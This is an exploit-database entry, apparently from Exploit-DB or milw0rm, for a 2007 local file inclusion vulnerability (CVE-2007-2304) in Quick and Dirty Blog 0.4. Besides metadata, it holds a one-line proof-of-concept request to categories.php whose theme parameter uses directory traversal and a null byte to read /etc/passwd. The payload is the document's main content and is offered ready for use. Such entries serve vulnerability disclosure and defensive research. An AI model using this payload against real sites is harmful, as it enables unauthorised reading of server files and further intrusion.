Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2007-11-02
date_updated: 2016-10-27
verified: 1
codes: CVE-2007-2304
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comqdblog-0.4.tar.bz2
Quick and Dirty Blog 0.4 (categories.php) Local File Inclusion Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/qdblog/qdblog-0.4.tar.bz2
POC:
/categories.php?theme=../../../../../../../../../etc/passwd%00
# milw0rm.com [2007-11-03]